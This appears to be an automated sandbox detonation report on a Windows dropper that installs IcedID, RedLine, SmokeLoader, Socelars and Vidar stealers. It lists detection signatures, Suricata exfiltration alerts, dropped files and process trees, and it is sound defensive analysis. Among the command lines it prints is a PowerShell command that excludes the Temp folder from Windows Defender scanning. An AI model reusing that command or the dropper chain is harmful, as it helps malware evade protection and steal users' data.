memory/1504-208-0x0000000001E80000-0x0000000002ACA000-memory.dmp

memory/2676-209-0x0000000000000000-mapping.dmp

memory/2696-210-0x0000000000000000-mapping.dmp

memory/2716-212-0x0000000000000000-mapping.dmp

memory/2872-224-0x0000000000000000-mapping.dmp

memory/2860-223-0x0000000000000000-mapping.dmp

memory/2796-218-0x0000000000000000-mapping.dmp

memory/2824-220-0x0000000000000000-mapping.dmp

memory/2836-221-0x0000000000000000-mapping.dmp

memory/2844-222-0x0000000000000000-mapping.dmp

memory/2756-214-0x0000000000000000-mapping.dmp

memory/2784-216-0x0000000000000000-mapping.dmp

memory/2812-219-0x0000000000000000-mapping.dmp

memory/2772-215-0x0000000000000000-mapping.dmp

memory/1504-226-0x0000000001E80000-0x0000000002ACA000-memory.dmp

memory/2744-217-0x0000000000000000-mapping.dmp

memory/2728-213-0x0000000000000000-mapping.dmp

memory/2940-227-0x0000000000000000-mapping.dmp

memory/3040-234-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1356-232-0x0000000000000000-mapping.dmp

memory/3000-233-0x0000000000000000-mapping.dmp

memory/1616-231-0x0000000000000000-mapping.dmp

memory/2784-244-0x00000000000C0000-0x00000000000C1000-memory.dmp

memory/2168-245-0x0000000000000000-mapping.dmp

memory/2756-242-0x0000000000C60000-0x0000000000C61000-memory.dmp

memory/2728-248-0x0000000000F20000-0x0000000000F21000-memory.dmp

memory/2096-246-0x0000000000000000-mapping.dmp

memory/2852-251-0x0000000000000000-mapping.dmp

memory/2884-257-0x0000000000000000-mapping.dmp

memory/2136-254-0x0000000000000000-mapping.dmp

memory/2564-256-0x0000000000000000-mapping.dmp

memory/2592-253-0x0000000000000000-mapping.dmp

memory/2492-255-0x0000000000000000-mapping.dmp

memory/2728-258-0x0000000004BF0000-0x0000000004BF1000-memory.dmp

memory/2096-264-0x0000000000400000-0x0000000000682000-memory.dmp

memory/2096-267-0x0000000000360000-0x0000000000363000-memory.dmp

memory/2852-268-0x0000000000120000-0x0000000000130000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-09-18 12:04

Reported

2021-09-18 12:07

Platform

win10v20210408

Max time kernel

31s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe"

Signatures

IcedID, BokBot

trojan banker icedid

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

suricata: ET MALWARE Amadey CnC Check-In

suricata

suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

suricata

suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

suricata

suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent

suricata

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata

suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

suricata

suricata: ET MALWARE Win32/IcedID Request Cookie

suricata

suricata: ET MALWARE Win32/Tnega Activity (GET)

suricata

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed222a0abb0f39640f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22398ca1246818a50.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2246f9dc6f4f9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2260b25c317.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed224b216a9b264.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22214190470.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed221ce23cd2c4a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed229825989c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22d29285f2462824d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2236d9fce9bd29d13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b6e8b18c18b003.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FLSC3.tmp\Wed221ce23cd2c4a6.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2260b25c317.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4KO9N.tmp\___YHDG34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FLSC3.tmp\Wed221ce23cd2c4a6.tmp N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4000 set thread context of 1028 N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2260b25c317.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22d29285f2462824d.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22d29285f2462824d.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22d29285f2462824d.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22d29285f2462824d.exe
N/A N/A C:\Windows\system32\WerFault.exe C:\Users\Admin\AppData\Local\Temp\2.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22d29285f2462824d.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22d29285f2462824d.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22d29285f2462824d.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed226b251ef55.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2236d9fce9bd29d13.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22214190470.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22398ca1246818a50.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3728 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3728 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3728 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 3380 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe
PID 3380 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe
PID 3380 wrote to memory of 3440 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe
PID 3440 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 968 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1360 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1460 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1724 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 1616 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 912 wrote to memory of 3200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 912 wrote to memory of 3200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 912 wrote to memory of 3200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3440 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3440 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1724 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed222a0abb0f39640f.exe
PID 1724 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed222a0abb0f39640f.exe
PID 1724 wrote to memory of 2504 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed222a0abb0f39640f.exe
PID 1012 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22398ca1246818a50.exe
PID 1012 wrote to memory of 2688 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22398ca1246818a50.exe
PID 1360 wrote to memory of 3576 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2246f9dc6f4f9.exe
PID 1360 wrote to memory of 3576 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2246f9dc6f4f9.exe
PID 1460 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2260b25c317.exe
PID 1460 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2260b25c317.exe
PID 1460 wrote to memory of 4000 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed2260b25c317.exe
PID 1616 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed224b216a9b264.exe
PID 1616 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed224b216a9b264.exe
PID 1616 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed224b216a9b264.exe
PID 968 wrote to memory of 3656 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22214190470.exe
PID 968 wrote to memory of 3656 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed22214190470.exe
PID 1608 wrote to memory of 3984 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\Wed221ce23cd2c4a6.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe

"C:\Users\Admin\AppData\Local\Temp\a4806a7fffe5d04d7ccd764890bd4ef3.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS43DC4141\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22398ca1246818a50.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed22214190470.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed226b251ef55.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2236d9fce9bd29d13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed2246f9dc6f4f9.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed221ce23cd2c4a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed222a0abb0f39640f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed226b6e8b18c18b003.exe

